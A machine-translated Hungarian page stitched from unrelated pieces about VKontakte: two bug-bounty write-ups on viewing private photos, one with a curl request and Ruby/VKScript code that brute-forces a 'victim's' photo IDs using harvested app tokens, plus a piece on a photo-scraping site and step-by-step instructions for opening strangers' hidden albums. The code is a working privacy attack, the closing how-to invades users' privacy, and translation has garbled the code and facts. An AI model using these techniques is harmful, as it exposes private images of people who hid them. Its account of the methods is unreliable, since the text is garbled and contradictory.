2016. február 10-én 15:23-kor

A VKontakte sebezhetősége: hozzáférés a fényképek előnézetéhez bármely felhasználó párbeszédablakából és rejtett albumaiból

Rövid

Sebezhetőséget fedeztek fel a vk.com webhely mobil verziójában. Lehetővé tette a rejtett fotók előnézetének megtekintését, beleértve a felhasználói beszélgetésekből származó képeket, valamint információkat kaphat azokról a felhasználókról, akiknek tetszett ez a rejtett fotó. Jelenleg a sérülékenység már nem létezik – hat hónapja javították. A VKontakte 700 dollár értékben fejezte ki háláját (nem, nem szavazatban).

Hogyan kezdődött az egész

A foglalkozáson minden eltereli a figyelmét, csak ne készüljön fel a vizsgákra. Tehát amikor megláttam a VKontakte Bug Bounty programját a hackerone.com-on, ahelyett, hogy vizsgákra készültem volna, sebezhetőségeket kezdtem keresni. Valamilyen oknál fogva azonnal vonzott, hogy a fényképekkel és a rejtett adatvédelmi beállításokkal kapcsolatos sebezhetőségeket keressem, és mint kiderült, nem volt hiábavaló.

Keressen sebezhetőséget a webhely teljes verziójában

Feltételezve, hogy ismerem a rejtett fotó azonosítóját (a megtalálásáról lentebb olvashat bővebben), elkezdtem ezzel az azonosítóval helyettesíteni mindenféle curl kérésben – megpróbáltam elmenteni a rejtett képeket az albumomba, megcímkézni magam bennük, kedvelni, újra közzétenni, stb semmi sem adott pozitív eredményt, amíg nem próbáltam egyszerűen elküldeni egy rejtett fotót a falamra. Furcsa volt az eredmény - a konzolban a kérés a helyes eredményt adta vissza, és egy új bejegyzés jelent meg a falon, de bármennyire is próbálkoztam. , minden leállt a szerveren, megpróbált elküldeni egy rejtett fotót a falra - a hozzászólások üresek voltak.

Váltson mobil verzióra

Aztán eszembe jutott ez a megjegyzés, és úgy döntöttem, hogy megpróbálom ugyanezt megtenni a webhely mobil verziójában.

Fénykép küldése a falra:

Curl "http://m.vk.com/wall53083705" -H "Cookie: remixsid=#remixsid" --data "act=post&hash=#hash&attach1_type=photo&attach1=idOwnerPhoto_idHiddenPhoto" # fotóazonosító egy két részből álló részből áll. idOwnerPhoto_idHiddenPhoto
Ez a kérés nem lett kitöltve megfelelően, de az oldal frissítése után meglepődve tapasztaltam, hogy a beküldési űrlapon megjelent a fénykép egy kis példánya.

A fotó maximális mérete 130x130, de ez elegendő például az arcok felismeréséhez a fotón. A teljes fénykép linkjének megszerzésére tett kísérletek nem jártak sikerrel. Úgy tűnik, a biztonsági rés bezárása után a teljes méretre mutató közvetlen hivatkozások nem szerezhetők könnyen az oldal mobil verziójáról.

Fényképek böngészése

Sebezhetőséget találtunk. A talált sebezhetőség kihasználásához be kell szereznie a megtámadott fénykép azonosítóját.

A fényképes igazolvány két részből áll: photo12345_330000000 (Owner_idPhoto), a második rész fotóról fotóra nő, de ez nem egy rendszeres automatikus növekedés. Mivel a lépéskiválasztás algoritmusa ismeretlen, ismételjük az 1. lépéssel.

A felsoroláshoz az api módszert fogjuk használni photos.delete. Az összes létező fotónál (beleértve a rejtetteket is) ez a módszer visszatér hibakód: 15. És minden nem létező fényképes igazolvány után egyet visszaadunk.

Keresés sebessége

Ebből a cikkből megtudhatja, hogyan válogathat gyorsan a fényképek között. Igen, a benne szereplő adatok nem a legfrissebbek, de ha figyelembe vesszük, hogy az év során megduplázódott a fényképek száma, a keresési idő továbbra is elfogadható.

ahhoz, hogy megtudja a felhasználó fényképeire mutató közvetlen linkeket, mondjuk a tavalyi évről, mindössze 30 millió (_320000000-től _350000000-ig) különböző linkváltozatok között kell válogatnia.

Az említett cikkben szereplő keresési gyorsítások segítségével a felhasználó fényképei között lehetett keresni:

1 perc alatt megkapja az összes tegnapi fotóját, 7 perc alatt - az összes múlt héten feltöltött fotót, 20 perc alatt - múlt hónapban, 2 óra alatt - tavaly.

Nyitott/rejtett megszüntetése

Miután megkapta a felhasználó összes (rejtett és nyitott) fényképére mutató hivatkozást, csak a rejtett fotókat választhatja ki úgy, hogy a photos.getById módszerrel próbál információt szerezni a fényképről. Azok a fotók, amelyekhez ezzel a módszerrel nem adnak vissza információt, el vannak rejtve.

Információk a kedvelt felhasználókról

Fel lehetett ismerni azokat a felhasználókat is, akiknek tetszett a rejtett fotó. A likes.getList metódus visszaadta az összes olyan felhasználót, aki adott objektumot hozzáadott a kedvelések listájához, még akkor is, ha az objektum el volt rejtve a metódus futtatója előtt.

Jelentse a hackerone-nak

A beszámolómat júniusban nyitottam meg. Két és fél hónap után bezárták a sebezhetőséget anélkül, hogy bármit mondtak volna. Egy hónappal később azt a választ kaptam, hogy a sérülékenységet megerősítették és bezárták. És egy idő után kaptam egy jutalmat.

Ui.: azoknak, akik először próbálnak kivenni jutalmakat a hackerone.com-ról egy új paypal számlára, azt javaslom, hogy figyelmesen olvassák el a feltételeket. A Paypal pénzátutaláskor az Ön hozzájárulása nélkül átválthatja a jutalmat a profiljában megadott ország pénznemére.

Egyes felhasználók megtagadják a hozzáférést felvételeikhez, albumaikhoz, fényképeikhez, hang- és videofelvételeikhez. A rejtett fényképek megtekintéséhez egy VK oldalon ismernie kell az azonosítóját.

Bármilyen VK-művelet végrehajtásához, beleértve az azonosító keresését, jelentkezzen be bejelentkezési nevével vagy telefonszámával és jelszavával.

A privát fényképek megtekintéséhez másolja ki a felhasználói azonosítót a böngésző címsorából. Ehhez nyissa meg a kívánt oldalt, és az „id” szó után a számokat fogja látni:

Vannak helyzetek, amikor a felhasználó beceneve jelenik meg az id helyett. Ebben az esetben az azonosító megtudásához kattintson a falon lévő bármely bejegyzésre, és nyissa meg a hivatkozás címét a böngészőben. Az azonosító a „fal” szöveg és az aláhúzás között látható.

Ha nincsenek bejegyzések a falon, akkor megnyithatja a személy avatárját, és a böngészőben megtalálhatja a „fotó” szó utáni azonosítót.

Vannak olyan helyzetek, amikor a felhasználó teljesen korlátozza az adataihoz való hozzáférést oly módon, hogy az avatar nagyítása és megtekintése lehetetlen. Sőt, id helyett becenév is van az oldalán. Ebben az esetben a HTML kódhoz kell fordulnia. Ehhez kattintson a jobb gombbal, és válassza az „Oldalkód megtekintése” fület

Másolja ki a felhasználónevet, indítsa el a keresést a „Ctrl+F” billentyűkombinációval, és illessze be az adatokat a megfelelő mezőbe. Kattintson az OK gombra. A böngésző 1 és 2 egyezést mutat. Ha az első egyezéshez nincs megadva azonosító, akkor lépjen tovább a másodikra.

Hogyan lehet megtekinteni a felhasználó fényképeit az azonosító ismeretében

Az azonosító ismeretében megtekintheti a privát fotókat, beleértve azokat is, amelyeken az adott személyt más felhasználók megcímkézték. Ehhez a következőket kell tennie:

1. A böngésző címsorába írja be a következő szöveget:

Privát fényképek hatalmas gyűjteménye a VK-n (körülbelül 100 millió). A szolgáltatás a közösségi média összes felhasználójáról fotókat gyűjt. hálózatokat egyetlen könyvtárba.

Egy adott felhasználó fényképeinek megkeresése egyszerű – csak írja be. De nehéz eltávolítani, ha e-mailben írsz az alkotóknak, akkor kicsi az esély, de ha adományokat teszel, megnő az esély.

Hogyan gyűjti a szarvasmarha raktár a képeket a VK-n? Nagyon egyszerű: a szolgáltatás automatikusan feltölti az összes online felhasználó fényképét a gyűjteménybe. Nem számít, hol teszed közzé a fotódat, egy közösségben vagy egy profilban. Ha a fotót pár perc múlva törlik is, az már a szarvasmarha állomáson lesz.

Ezért sok elégedetlen felhasználó a Roskomnadzorhoz fordult, amely hozzájárult a szarvasmarha állomást elzárták az Orosz Föderáció területén. A blokkolást nem lehet megkerülni.

A felhasználók személyes adatainak gyűjtése és tárolása tilos. Bár a felhasználók maguk tesznek közzé fényképeket a nyilvánosság számára.

Átmenetileg az oldal nem működik akár proxy szerverekkel is. A tulajdonosok a zárolás után azonnal felhagytak az üzlettel. Így nyugodtan aludhat, és nem fél attól, hogy valaki megnézi személyes fényképeit.

Skotobaza analógjai

2018-ban Különféle analógok léteztek, például a „Burn”, de mindegyik nem működik, mivel a VKontakte fejlesztői olyan szkripteket módosítottak, amelyek megtiltják a robotoknak, hogy privát fényképeket lopjanak el.

Figyelem: Az internet tele van egy szarvasmarhafarm „analógjával”, de nemhogy nem működnek, hanem fiók feltörése! Ha ilyen oldalakra bukkan, semmi esetre se ne írjon be adatokat a VKontakte-ból. A támadók hozzáférhetnek a fiókhoz, és képesek lesznek rá.

Az állattartó telepek és hasonló szolgáltatások korszaka lejárt. Mostantól tilos az intim, privát fényképek tárolása és terjesztése. Ha nem tartja be a törvényt, büntetés következik.

tl;dr

Sebezhetőséget fedeztek fel a VK-könyvjelzőkben, amely lehetővé tette, hogy bármely felhasználó/csoport személyes üzeneteiből és albumaiból közvetlen linkeket kapjanak privát fényképekre. Készült egy szkript, amely egy bizonyos ideig válogatta a felhasználói fényképeket, majd ezen a sérülékenységen keresztül közvetlen linkeket kapott a képekre. Röviden: az összes tegnapi fotódat 1 perc alatt, a múlt héten feltöltött összes fotót 7 perc alatt, a múlt hónapban 20 perc alatt, a tavalyit 2 óra alatt feltöltötted. A sérülékenységet most javították. A VKontakte adminisztrációja 10 ezer szavazatot fizetett ki.

A történet akkor kezdődött, amikor egy képet küldtek nekem személyes üzenetben a VKontakte-on. Általában, ha valami fontos, feltöltöm a felhőbe, de az én esetemben erre nem volt szükség, és úgy döntöttem, hogy a VKontakte könyvjelző funkcióját használom.

Röviden erről a funkcióról: minden olyan dolog, ami a felhasználónak tetszett, hozzáadódik a könyvjelzőkhöz; Van egy funkció is, amellyel manuálisan hozzáadhat egy hivatkozást a felhasználóhoz és egy belső VKontakte hivatkozást. Az utolsó pont nagyon érdekesnek tűnt számomra, mert miután linket adtam a fotóhoz, láttam az előnézetet és a szöveget a hozzáadott entitás típusával:

A hivatkozás hozzáadásakor a szerver elemzi azt, megpróbálja kideríteni, hogy melyik entitásra hivatkozik, és lekéri az objektumra vonatkozó információkat az adatbázisból. Jellemzően, ha egy ilyen típusú függvényt sok feltétellel írunk, nagyon nagy a valószínűsége annak, hogy a fejlesztő elfelejt valamit. Így nem engedhettem meg magamnak, hogy kihagyjam, és úgy döntöttem, szánok néhány percet egy kis kísérletezésre.

Ennek eredményeként sikerült találnom valamit. Ha linket ad hozzá egy fényképhez, jegyzethez vagy videóhoz, amely nem érhető el, akkor egy kis személyes információt kaphat az objektumról. A fotók és videók esetében ez egy kis (150x150-es) előnézet, amin elég nehezen lehetett látni a címet privát jegyzetekhez. API-módszeren keresztül fave.getLinks A képhez linkeket lehetett szerezni, de a méret ismét kicsi volt (75px és 130px). Szóval lényegében semmi komoly.

Úgy döntöttem, hogy felkeresem az oldal mobil verzióját, hogy megnézzem, ott minden ugyanúgy jelenik-e meg, mint a normál verzióban. Az oldal kódjára nézve ezt láttam:

Igen! Az attribútum értékében data-src_big közvetlen link volt az eredeti képhez!

Így közvetlen linket lehetett kapni a VKontakte bármely képéhez, függetlenül attól, hogy hová lett feltöltve és milyen adatvédelmi beállításokkal rendelkezik. Ez lehet személyes üzenetekből származó kép vagy bármely felhasználó/csoport privát albumából származó fénykép.

Úgy tűnik, itt megállhatok és írhatok a fejlesztőknek, de elgondolkodtam, hogy a biztonsági rést kihasználva hozzá lehet-e jutni a felhasználó összes (vagy meghatározott időn belül letöltött) fényképéhez. A fő probléma itt, amint Ön is tudja, az volt, hogy az űrlap privát fényképére mutató link nem mindig ismert fotóXXXXXX_XXXXXXXXX hozzáadni a könyvjelzőihez. Eszembe jutott a gondolat, hogy a fotó azonosítóját keressem, de valamiért azonnal elvetettem, mint őrültséget. Megnéztem a fotókkal kapcsolatos módszereket az API-ban, megnéztem, hogyan működik az alkalmazás az albumokkal, de nem találtam olyan kiszivárogtatást, amely segíthetne abban, hogy a felhasználó összes privát fényképének azonosítóit tartalmazó listát kapjak. Már-már feladtam volna ezt az ötletet, de újra megnézve a linket a fotóval, hirtelen rájöttem, hogy jó ötlet a túlzás.

Hogyan működnek a fotók a VK-ban

Hogyan tudnád cserélni, link a fotóhoz fotó52708106_359542386 két részből áll: (felhasználói azonosító)_(valami furcsa szám). Hogyan készül a második rész?

Jaj, két óra kísérletezés után még mindig nem értettem ezt. 2012-ben a HighLoad++-on Oleg Illarionov mondott néhány szót a fotók tárolási módjáról, a vízszintes megosztásról és a szerver véletlenszerű kiválasztásáról a feltöltéshez, de ez az információ nem adott nekem semmit, mivel nincs kapcsolat a szerver azonosítója és a fényképes igazolvány. Egyértelmű, hogy van valamiféle globális számláló, de van ott valami más logika... Mert ha a második számot közönséges automatikus növekmény segítségével alakítanák ki, akkor a fényképes igazolványok értékei már régen hatalmas értékeket értek volna el. (a Facebooknál például jelenleg ~700 billió), de a Vkontakte-nál ez az érték csak ~400 millió (bár a statisztikákból ítélve napi a felhasználók több mint 30 millió fényképet töltenek fel). Azok. Nyilvánvaló, hogy ez a szám nem egyedi, ugyanakkor nem is véletlen. Írtam egy forgatókönyvet, amely végigment a „régi” felhasználók fényképein, és a kapott adatok felhasználásával grafikont készítettem arról, hogy ez az adat mennyit változott az egyes év:

Látható, hogy az értékek bizonyos tényezőktől függően (szerverek száma vagy új logika?) ingadoznak. De a lényeg, hogy elég kicsik (főleg az elmúlt 2-3 évben), és nagyon könnyű kiszámolni az id tartományt a kívánt időszakra. Azaz ahhoz, hogy egy felhasználó fényképeire mutató közvetlen hivatkozásokat találjon, mondjuk a tavalyi évről, mindössze 30 millió (_320000000-től _350000000-ig) különböző hivatkozási változatot kell megkísérelnie a könyvjelzők közé tenni! Az alábbiakban leírtam egy brute force technikát, amely lehetővé tette számomra, hogy ezt néhány perc alatt megtegyem.

Végignézve a fényképeket

Mindezt hozzáadhatja manuálisan a felületen keresztül, vagy írhat egy szkriptet, amely egy hivatkozást ad a könyvjelzőkhöz, de ez unalmas és időigényes lenne. A keresési sebesség ebben az esetben másodpercenként 3 könyvjelző lenne, mert küldjön több mint három kérést másodpercenként a Vkontakte szervernek ez tiltott.

Gyorsítsa fel a keresést x25-re

Hogy legalább egy kicsit megkerüljem a 3 kérés határát, a módszer alkalmazása mellett döntöttem végrehajtani. Ennek a metódusnak egy hívása során 25 API metódus hívása lehetséges.

Var start = parseInt(Args.start); var end = parseInt(Args.end); var áldozatId = Args.id; var link = "http://vk.com/photo" + áldozatazonosító + "_"; while(start != end) ( API.fave.addLink(( "link": link + start )); start = start + 1; );
Így sikerült a brute force sebességet 3*25 könyvjelző/sec-re növelni. Az elmúlt évben sokáig tartott volna a fényképek válogatása, de rövid ideig ez a válogatási módszer már elég jó volt.

Felgyorsítjuk a keresést x25 * párhuzamos kérések száma másodpercenként

A kérések/másodpercenkénti szám korlátja minden alkalmazásra külön vonatkozik, nem pedig a teljes felhasználóra. Tehát semmi sem akadályozza meg abban, hogy sok kérést párhuzamosan küldjön, ugyanakkor különböző alkalmazásokból származó tokeneket használjon.

Először meg kellett találnunk (vagy létrehoznunk) a szükséges számú alkalmazást. Egy szkriptet írtak, amely önálló alkalmazásokat keres az alkalmazásazonosítók adott tartományában:

Osztály StandaloneAppsFinder attr_reader:app_ids def inicialize(params) @range = params[:in_range] @app_ids = def search vége (@range).each do |app_id| válasz = open("https://api.vk.com/method/apps.get?app_id=#(app_id)").read app = JSON.parse(response)["response"] app_ids<< app_id if standalone?(app) end end private def standalone?(app_data) app_data["type"] == "standalone" end end
A keresés további felgyorsítása érdekében a felhasználók száma alapján is lehetett alkalmazásokat kiválasztani:

De úgy döntöttem, hogy nem foglalkozom vele.

Rendben, az alkalmazásokat megtaláltuk, most engedélyt kell adniuk felhasználónk adataihoz és tokeneket kapniuk. Az engedélyezéshez az Implicit Flow mechanizmust kellett használnunk. Elemeznem kellett az engedélyezési URL-t az OAuth párbeszédpanelen, és ki kellett húznom a tokent az átirányítás után. Ennek az osztálynak a működéséhez cookie-k szükségesek. p,l(login.vk.com) és remixsid(vk.com):

Class Authenticator attr_reader:access_tokens def inicialize(cookie_header) @cookies = ( "Cookie" => cookie_header ) @access_tokens = end def authorize_apps(apps) apps.each do |app_id| auth_url = kivonat_auth_url_from(oauth_page(app_id)) redirect_url = open(auth_url, @cookies).base_uri.to_s access_tokens<< extract_token_from(redirect_url) end end private def extract_auth_url_from(oauth_page_html) Nokogiri::HTML(oauth_page_html).css("form").attr("action").value end def extract_token_from(url) URI(url).fragment end def oauth_page(app_id) open(oauth_page_url(app_id), @cookies).read end def oauth_page_url(app_id) "https://oauth.vk.com/authorize?" + "client_id=#{app_id}&" + "response_type=token&" + "display=mobile&" + "scope=474367" end end
A talált alkalmazások száma megegyezik a párhuzamos kérelmek számával. Ennek az egésznek a párhuzamba állítása érdekében a Typhoeus gyöngyszeme mellett döntöttek, amely más feladatokban is bevált. Az eredmény egy ilyen kis brute forcecer:

Class PhotosBruteforcer PHOTOS_ID_BY_PERIOD = ( "ma" => 366300000..366500000, "tegnap" => 366050000..366300000, "jelenlegi_hónap" => 366300000.06,050006 0000 00..365000000, "aktuális_év" = > 350000000..366500000, "last_year" => 320000000..350000000 ) def inicializál(params) @victim_id = params[:victim_id] @period = PHOTOS_ID_BY_BY_PERIOD:en sIterator = 0 (@period).step(25) do |photo_id| url = "https://api.vk.com/method/execute?access_token=#(tokens)&code=#(vkscript(photo_id))" encoded_url = URI.escape(url).gsub("+", "% 2B").delete("\n") tokensIterator = tokensIterator == tokens.count - 1 ? 0: tokensIterator + 1 hydra.queue Typhoeus::Request.new encoded_url hydra.run, ha a tokensIterator.zero? vége hydra.run, hacsak nem hydra.queued_requests.count.zero? end private def vkscript(photo_id)<<-VKScript var start = #{photo_id}; var end = #{photo_id + 25}; var link = "http://vk.com/photo#{@victim_id}" + "_"; while(start != end) { API.fave.addLink({ "link": link + start }); start = start + 1; }; return start; VKScript end end
Hogy a nyers erőt még jobban felgyorsítsák, a válaszban megpróbálták megszabadulni a felesleges testtől, de FEJ A VKontakte szerver kérése hibát ad vissza 501 Nincs végrehajtva.

A szkript végső verziója így néz ki:

"nokogiri" megkövetelése "open-uri" megkövetelése "typhoeus" megkövetelése "json" szükséges "./standalone_apps_finder" szükséges "./photos_bruteforcer" szükséges "./authenticator" bruteforcer = PhotosBruteforcer.new(áldozatazonosító: ARGV, pont: ARGV) apps_finder = ÖnállóAppsFinder.new(tartományban: 4800000..4800500) apps_finder.search # p,l - cookie-k a login.vk.com webhelyről # remixsid - cookie a vk.com-ról authenticator = Authenticator.new("p=;" + "l =;" + "remixsid=;") authenticator.authorize_apps(apps_finder.app_ids) bruteforcer.run(authenticator.access_tokens)
A program futtatása után a könyvjelzők a felhasználó összes fényképét tartalmazták egy adott időszakra vonatkozóan. Nem volt más hátra, mint a VKontakte mobil verziójára lépni, megnyitni a böngészőkonzolt, kihúzni a közvetlen hivatkozásokat, és élvezni a fényképeket eredeti méretükben.

Eredmények

Általában minden az internetkapcsolatától és a proxyszerverek sebességétől, a Vkontakte szerverek késleltetésétől, a processzor teljesítményétől és sok más tényezőtől függ. Miután kipróbáltam a fenti szkriptet a fiókomon, a következő számokat kaptam (anélkül, hogy figyelembe vettem volna a tokenek fogadására fordított időt):

A táblázat azt mutatja, hogy egy adott időszakban átlagosan mennyi idő szükséges a fényképes igazolványok kipróbálásához. Biztos vagyok benne, hogy mindezt 10-20-szor fel lehetett volna gyorsítani. Például egy brute force szkriptben hozzon létre egy nagy sort az összes kérésből és a köztük lévő normál szinkronizálásból, mert az én megvalósításomban egy kérés időtúllépéssel lelassítja a teljes folyamatot. És általában vásárolhat néhány példányt az EC2-n, és egy óra alatt megkaphatja bármelyik felhasználó összes fényképét. De már aludni akartam.

És általában nem mindegy, hogy a támadó mennyi időt tölt ezzel, 5 órát vagy egész napot, mert így vagy úgy kap linkeket privát képekhez. A biztonsági rés által jelentett fő fenyegetés a személyes adatokhoz való biztonságos hozzáférés korlátozott időn belüli képessége.

Sebezhetőség bejelentése

Eleinte elküldték a bejelentést a támogatási szolgálatnak, de a „köszönöm, valószínűleg megoldjuk valahogy...” válasz és egy hét várakozás után szomorúan éreztem magam. Nagyon köszönjük Bo0oM-nak, aki segített közvetlenül kapcsolatba lépni a fejlesztőkkel. Ezt követően a hibákat néhány órán belül lezárták, majd néhány nappal később az adminisztráció 10 ezer értékű jutalmat utalt a számlámra

A lehetőségek feltárása és a VKontakte modern közösségi hálózat oldalainak egyszerű használata során a felhasználóknak számos kérdésük van. Az egyik leggyakoribb megoldás a rejtett fényképek megtekintésére a VKontakte-on. A felhasználók gyakran teljesen vagy részben elrejtik profiljukat, így képeiket nem tudják megtekinteni.

Mielőtt megvizsgálná a rejtett fényképek megtekintésének lehetőségét, érdemes röviden megfontolni az elrejtés témáját. A fényképek elrejtéséhez kövesse az alábbi lépéseket:

• Mennie kell a VK oldalra;
• A bal oldalon keresse meg a „Saját beállítások” sort, és aktiválja azt;
• Nyissa meg az „Adatvédelem” alrészt;
• Megjelennek a speciális adatvédelmi beállítások. Saját belátása szerint telepíthetők.

Nemcsak fényképeket, hanem hangfelvételeket, bejegyzéseket és barátokat is elrejthet. Ha kiválasztja azt a sort, amely tükrözi, hogy ki láthatja a fényképet, meg kell határoznia, hogy ki láthatja a személyes fényképeket. Itt kiválaszthatja a teljes adatvédelmet, ha „csak én”-re állítja, vagy engedélyezi a megtekintést csak az ismerősök számára. A telepített funkciók a beállítások elvégzése után azonnal működni kezdenek.

Hogyan lehet megtekinteni a mentett képeket a VK-ban, ha rejtettek?

Tehát hogyan lehet látni a VK-felhasználók rejtett fotóit? Itt nincs hivatalos cselekvési terv, mivel a közösségi hálózat fejlesztői tiszteletben tartják a felhasználók azon vágyát, hogy megőrizzék magánéletüket. Ha rejtett VK-fotókat szeretne megtekinteni, kövesse az alábbi lépéseket:

1. Meg kell lépnie annak a felhasználónak a profilját, akinek a fényképét látni szeretné.
2. Kattintson egy üres helyre egy normál egérgombbal.
3. Válassza az „Oldal forráskódjának megtekintése” részt.
4. Nyomja meg a Ctrl+F billentyűkombinációt.
5. A keresésbe írja be, hogy „albumok”, csak idézőjelek nélkül.
6. A számok a szó utáni sorban jelennek meg, ezeket másolni kell. Ez az oldal kódja.
7. Újra be kell lépnie a felhasználó profiljába, és az azonosító után a címsorba be kell írnia, hogy „?z=albums”, szintén idézőjel nélkül.
8. A korábban másolt töredék beillesztésre kerül.
9. Nyomja meg az Enter billentyűt, és élvezze a rejtett fényképek megtekintéséhez.

Fontos! Ez a lehetőség a privát fényképek megtekintésére, ha a hozzáférés le van zárva, a VK adminisztrációja nem hagyja jóvá.

Emiatt ne lepődjön meg, ha a mentett fényképek megtekintésének lehetősége, ha el vannak rejtve, be van zárva.

Webhely a VKontakte rejtett fényképek megtekintéséhez

Ez a módszer egy már beérkezett kódrészlet esetén használható, amelyet a fent leírt módszerrel kaphatunk meg. A rejtett fotók megtekintéséhez vissza kell térnie a kívánt oldalra, a közösségi oldalon a böngésző keresősávjában írjon be egy hivatkozást típus szerint rendezve - vk.com/id...., ahol az azonosító után van egy oldal azonosító szám. Ezután helyezze a kurzort a cím legvégére, és azonnal írja be a „?z=” speciális karaktereket.

Az ilyen műveletek hatására a következő üzenet jelenik meg a működő böngésző sorában: vk.com/id......?z=albums....., ahol az ellipszis a felhasználói azonosító. Az Enter megnyomása után az érdeklődő személy összes fényképe automatikusan megnyílik a figyelmed előtt.

Következtetés

A figyelmednek bemutatott meglehetősen egyszerű módszerekkel gond nélkül tanulmányozhatod a felhasználók fényképeit zárt albumokban. Az ilyen technikák fő előnye, hogy megtekintheti a fényképeket azoknak az embereknek az albumaiban, akik már nem barátok a VK-n, és teljesen idegenek.